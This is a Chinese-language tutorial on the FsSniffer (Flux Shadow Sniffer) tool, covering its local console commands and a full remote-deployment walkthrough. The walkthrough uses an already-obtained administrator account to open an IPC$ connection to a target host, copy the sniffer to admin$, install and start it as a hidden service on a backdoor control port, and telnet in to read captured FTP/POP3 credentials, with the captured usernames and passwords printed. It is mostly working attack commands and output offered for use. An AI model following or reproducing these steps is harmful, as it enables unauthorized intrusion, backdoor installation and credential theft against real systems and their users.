本地使用指南
启动FsSniffer工具的标准命令格式为:FSSNIFFER -S 。下面详细解析每个参数的具体含义:
Bind IP:指需要绑定的IP地址,通常设置为本地主机的IP地址,用于监听网络数据。
Port:此参数用于指定控制端口,后续需要通过此端口登录管理界面,查看捕获到的网络数据包结果。
Control Password:登录控制台时所需的身份验证密码,用于保障管理安全。
成功登录FsSniffer管理控制台后,需要掌握几个核心操作命令:使用Show Result命令可以查看所有捕获到的网络记录;输入Quit命令可直接退出当前控制台会话;而执行ShutDown命令则会彻底终止FsSniffer的监控进程。
远程部署与应用
远程部署FsSniffer的步骤相对复杂,但逻辑清晰。我们通过一个典型实例进行说明:假设已获取目标主机211.152.188.1的一个管理员组账号test,密码为test。
第一步,建立远程连接。 使用Windows系统自带的net use命令建立IPC$连接:
D:\>net use \\211.152.188.1\ipc$ test /user:test
The command completed successfully.
连接建立成功后,第二步是上传FsSniffer工具。 将本地的FsSniffer.exe文件直接复制到远程主机的系统目录(也可借助流光IV等安全工具中的“种植者”功能完成上传):
D:\>copy “d:\My Documents\ShadowSniffer\Release\FsSniffer.exe” \\211.152.188.1\admin$
1 file(s) copied.
第三步,安装并启动服务。 利用流光IV内置的NTCMD工具远程执行FsSniffer.exe,将其安装为系统服务。具体操作与系统回显如下:
=============Windows NT/2000 NTCmd Ver 0.1 for Fluxay IV============
Written by Assassin, https://www.netXeyes.com https://www.netXeyes.org
NTCMD>ver
Microsoft Windows 2000 [Version 5.00.2195]
NTCMD>fssniffer.exe -I test test ShadowSniffer 211.152.188.1 7 123456
Flux Shadow Sniffer(FTP/POP3) Edition, Written by Assassin 2001
TestSniffer1 installed.
NTCMD>
至此,远程主机上已成功安装了一个名为“ShadowSniffer”的系统服务。接下来,使用net命令启动该服务:
NTCMD>net start shadowsniffer
The ShadowSniffer service is starting..
The ShadowSniffer service was started successfully.
这里需要详细说明安装服务时的命令格式:FsSniffer -I 。
各参数定义如下:UserName与Password指远程主机上具备管理员权限的账号和密码;Service Name是用户自定义的服务名称,若安装失败,可尝试将FsSniffer.exe文件改名后重新执行;Bind Local IP是远程主机的监听IP地址,对于多网卡主机,需根据监听目标(如内网或外网流量)选择正确的地址;Port是后门控制端口号;Control Password则是远程连接时使用的控制密码。
服务启动并运行一段时间后,即可通过Telnet连接查看捕获结果。连接远程主机的指定端口(本例为端口7),并输入控制密码:
D:>telnet 211.152.188.1 7
Control Password: **************
===============Banyet Soft Labs. 1995-2001 All Rights Reserved.========================
Written by Assassin, Server Edition FluxShadow@21cn.com==================
FluxShadow Remote FTP/POP3 Sniffer Beta 1, Pleased to See You Again!======
Flux Shadow Sniffer>show result
===========Flux Shadow Sniffer Edition Results===========
211.152.188.112(1106)->211.152.188.1(8213) USER zjf
211.152.188.112(1106)->211.152.188.1(8213) PASS 1qaz4rfv
211.152.188.1(8213)->211.152.188.112(1106) User zjf logged in.
211.152.188.1(8199)->211.152.188.112(1107) USER zjf
211.152.188.1(8199)->211.152.188.112(1107) PASS 1qaz4rfv
Total 10 Sniffered
======================================================
小榕软件实验室™ 1995-2001版权所有
www.netXeyes.com www.netXeyes.org
dansnow@21cn.com